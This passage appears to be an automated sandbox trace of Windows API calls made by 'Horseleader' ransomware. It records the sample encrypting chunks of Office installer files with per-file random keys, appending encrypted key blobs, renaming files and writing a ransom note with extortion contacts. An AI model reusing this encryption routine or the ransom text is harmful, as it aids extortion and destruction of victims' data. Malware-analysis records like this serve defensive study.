"c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.horseleader")) returned 1 [0219.525] GetProcessHeap () returned 0x780000 [0219.525] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.525] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0219.526] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0219.526] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0219.526] StrStrIW (lpFirst="setup.exe", lpSrch=".horseleader") returned 0x0 [0219.526] lstrcmpW (lpString1="setup.exe", lpString2="#Decrypt#.txt") returned 1 [0219.526] lstrcmpW (lpString1="setup.exe", lpString2="_uninstalling_.png") returned 1 [0219.526] lstrlenW (lpString=".testttjffg") returned 11 [0219.526] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", lpSrch=".testttjffg") returned 0x0 [0219.526] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.526] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.527] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.527] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0219.527] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0219.527] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1377656) returned 1 [0219.527] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.527] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.530] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.530] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.530] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa5abc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.530] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.532] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.532] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.532] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14b578, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.532] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.541] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.541] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.542] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.542] CloseHandle (hObject=0x21c) returned 1 [0219.543] GetProcessHeap () returned 0x780000 [0219.543] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.543] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader") returned 88 [0219.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.horseleader")) returned 1 [0219.544] GetProcessHeap () returned 0x780000 [0219.544] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.544] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0219.544] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0219.544] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0219.544] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0219.544] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0219.544] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0219.544] lstrlenW (lpString=".testttjffg") returned 11 [0219.544] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0219.544] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.544] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.544] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0219.545] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0219.545] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=31094) returned 1 [0219.545] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.547] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.548] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.548] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x2976, lpOverlapped=0x0) returned 1 [0219.549] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffd68a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.549] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x2976, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x2976, lpOverlapped=0x0) returned 1 [0219.549] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.549] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.549] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.549] CloseHandle (hObject=0x21c) returned 1 [0219.550] GetProcessHeap () returned 0x780000 [0219.550] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.550] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0219.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0219.550] GetProcessHeap () returned 0x780000 [0219.551] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.551] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0219.551] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0219.551] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0219.551] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0219.552] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0219.552] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0219.553] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0219.553] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0219.553] CloseHandle (hObject=0x1cc) returned 1 [0219.553] GetProcessHeap () returned 0x780000 [0219.554] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0219.554] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0219.554] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0219.554] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned 66 [0219.554] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0219.554] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0219.554] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0219.554] GetProcessHeap () returned 0x780000 [0219.554] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0219.554] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*") returned 68 [0219.554] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0219.556] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0219.556] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.") returned 68 [0219.556] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0219.557] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0219.557] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0219.557] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0219.557] lstrlenW (lpString=".testttjffg") returned 11 [0219.557] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0219.557] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.557] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.557] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0219.557] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0219.557] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0219.557] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\..") returned 69 [0219.557] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0219.557] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0219.557] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0219.557] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0219.558] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0219.558] lstrlenW (lpString=".testttjffg") returned 11 [0219.558] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0219.558] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.558] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.558] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0219.558] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0219.558] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0219.558] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0219.558] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".horseleader") returned 0x0 [0219.558] lstrcmpW (lpString1="Office32WW.msi", lpString2="#Decrypt#.txt") returned 1 [0219.558] lstrcmpW (lpString1="Office32WW.msi", lpString2="_uninstalling_.png") returned 1 [0219.558] lstrlenW (lpString=".testttjffg") returned 11 [0219.558] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpSrch=".testttjffg") returned 0x0 [0219.558] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.558] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.559] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.560] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0219.560] StrStrW (lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0219.560] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1992192) returned 1 [0219.560] SetFilePointerEx 